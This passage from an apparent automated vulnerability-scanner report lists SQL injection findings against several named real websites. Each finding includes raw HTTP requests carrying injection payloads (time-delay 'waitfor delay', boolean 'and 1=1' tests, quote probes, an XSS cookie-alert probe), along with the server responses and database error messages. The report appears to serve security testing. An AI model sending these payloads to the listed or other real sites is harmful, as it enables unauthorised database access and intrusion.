GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:43:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/css
Expires: Fri, 18 Mar 2011 18:43:01 GMT
Cache-control: private

1.61. http://www.b2f-concept.com/KERNEL/DOC.ASP [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/DOC.ASP

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /KERNEL/DOC.ASP?id={75BF6FFD-43C6-474B-A2A0-A68D0CD33C09}'%20and%201%3d1--%20&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:51:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1396
Content-Type: image/gif
Expires: Fri, 18 Mar 2011 18:51:36 GMT
Cache-control: private

GIF89a.......................................................................................................................................................................................................!.......,............D"3$..Bb......R2.X4=.(..J.@..b#YR<...[i.I..E..`...=C.0.    ..................................|..
....    $.......................
.. ..T..T......................g.................y....... ....o.........B..F...!E..+J..q.8?. .. *...hH>..R...+O.0.@V..
.@.8!g....~^.9s..bE......Pr.".........V.j.&T.\.V..u.....28.A...m'.=.v+[.t.r.0A.......,.o.....F.x.a..4(x..C.../S.,y....Ac.<Z......0.Z5...O.~......, P. 7.."z....wp.....>.8q..K.~ B...c.~..v........e.
...@ =e....W.....!.....}...p....P& t...A...5`.p....``......
....a..>.!."zH.. .hb.....    -B.b.3..".6....4..c..V7.    . .@...P.z"(i$.#`...Q>...P....Z
....}...b.X&.#..e.F.i..l....a.Y....`.....g.{....S....."z...2Zh..
.....P...@P..G~`)..x.i..f.)......G......
...~@.
.......j.
.zI@.......xyl..&;@..".-..>[...f.,..^....v....r................+o....n....o..../...+....L....\.....0.
7....Klq..S<q.._.q...\1.#l.......+....,.,3...L..3..s.<.|s.>..t.@..3.G....?'...O#...P;m5.RW...Wk.u.`s.u.b]v.d..5.k....c...s....t..7.v....{.-x....w....x..7.8../....GN...C^...[.9..w.....nz...>z....z...^:...n................<...O.....|..#|../.}..W.<..O....g....c....{o>.........~....~..._....>...........7@.........h..2..t...HA.>....`.+...F......=x.n...

Request 2

GET /KERNEL/DOC.ASP?id={75BF6FFD-43C6-474B-A2A0-A68D0CD33C09}'%20and%201%3d2--%20&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:51:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Fri, 18 Mar 2011 18:51:37 GMT
Cache-control: private

1.62. http://www.b2f-concept.com/KERNEL/DOC.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/DOC.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the id parameter. The application took 61349 milliseconds to respond to the request, compared with 15108 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/DOC.asp?id={4A2C90A0-9D88-4CF4-A95B-49B0086E8D7C}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: image/pjpeg
Expires: Fri, 18 Mar 2011 19:50:13 GMT
Cache-control: private

1.63. http://www.b2f-concept.com/KERNEL/index.asp [NODE_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/index.asp

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the NODE_ID parameter. The application took 42058 milliseconds to respond to the request, compared with 3994 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/index.asp?NODE_ID={9E70064A-44D6-48DE-86A9-FDCD2BE067F6}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:01:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:21:15 GMT
Cache-control: private

1.64. http://www.b2f-concept.com/KERNEL/index.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/index.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/index.asp?NODE_REF=EDITION&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q="
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:41 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A41; expires=Sat, 25-Jun-2011 16:07:40 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=NBAGAOMBOGDMKKNIPLGJCLJB; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...
1.65. http://www.baysideeyes.com.au/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 196
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
1.66. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 209
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico'' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
1.67. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 196
Content-Type: text/html; charset=utf-8

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 15:58:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,User-Agent
Content-Length: 5388
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
1.68. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=AODCJGCBNPEOPJNIOMMCBHKP; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:15 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11958
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=CODCJGCBICICAENHLIHFJGFH; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:15 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
1.69. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx'/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=NCECJGCBHAHIIHMEHHCCKPPD; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:27 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx''/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11978
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=BDECJGCBOEGMOGLPOPIFEBPE; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:27 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO''/X22</title>
<meta name="descr
...[SNIP]...
1.70. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22'?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=MFECJGCBFKHMLKDBGLAOLFJG; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:32 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22''?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11978
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACBQCRRQ=OFECJGCBJKDAIPPHINOLACEC; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 18 Mar 2011 15:58:33 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...
1.71. http://www.caribbean-ocean.com/accommodation2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /accommodation2.php?id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:46:59 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10042

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...
1.72. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /accommodation2.php?id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
